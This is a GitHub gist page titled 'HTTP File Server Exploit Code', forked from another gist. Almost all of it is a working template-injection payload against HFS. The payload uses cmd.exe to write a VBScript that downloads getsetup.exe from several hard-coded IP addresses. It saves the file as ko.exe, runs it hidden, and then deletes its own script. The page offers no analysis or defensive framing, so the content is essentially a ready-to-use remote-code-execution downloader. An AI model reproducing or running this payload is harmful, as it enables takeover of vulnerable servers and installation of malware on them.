Skip to content

Instantly share code, notes, and snippets.

@rdev5

rdev5/HTTP File Server Exploit Code

Forked from rcbarnett-zz/HTTP File Server Exploit Code
Created September 24, 2015 22:26
Show Gist options
  • Save rdev5/e29cb501e8e312e974f2 to your computer and use it in GitHub Desktop.
Save rdev5/e29cb501e8e312e974f2 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
HTTP File Server Exploit Code
{.exec | cmd.exe / c echo > 22222.vbs dim wait, quit, out: Set xml = CreateObject("Microsoft.XMLHTTP"): Set WshShell = Wscript.CreateObject("WScript.Shell"): DS = Array("123.108.109.100", "123.108.109.100:53", "123.108.109.100:443", "178.33.196.164", "178.33.196.164:53", "178.33.196.164:443"): for each Url in DS: wait = true: quit = false: D(Url): if quit then: exit
for: end
if :next: Sub D(Url): if IsObject(xml) = false then: Set xml = CreateObject("Microsoft.XMLHTTP"): end
if :xml.Open "GET",
"http://" ^ & Url ^ & "/getsetup.exe",
True: xml.OnReadyStateChange = GetRef("xmlstat"): out = Now: xml.Send(): while (wait and 60 ^ > abs(datediff("s", Now, out))): wscript.sleep(1000): wend: End Sub: sub xmlstat(): If xml.ReadyState ^ < ^ > 4 Then: exit sub: end
if :wait = false: if xml.status ^ < ^ > 200 then: exit sub: end
if :quit = true: on error resume next: set sGet = CreateObject("ADODB.Stream"): sGet.Mode = 3: sGet.Type = 1: sGet.Open(): sGet.Write xml.ResponseBody: sGet.SaveToFile "ko.exe",
2: End sub: WshShell.run "ko.exe",
0,
0: Set fso = CreateObject("Scripting.Filesystemobject"): fso.DeleteFile(WScript.ScriptFullName) & cscript 22222.vbs.
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment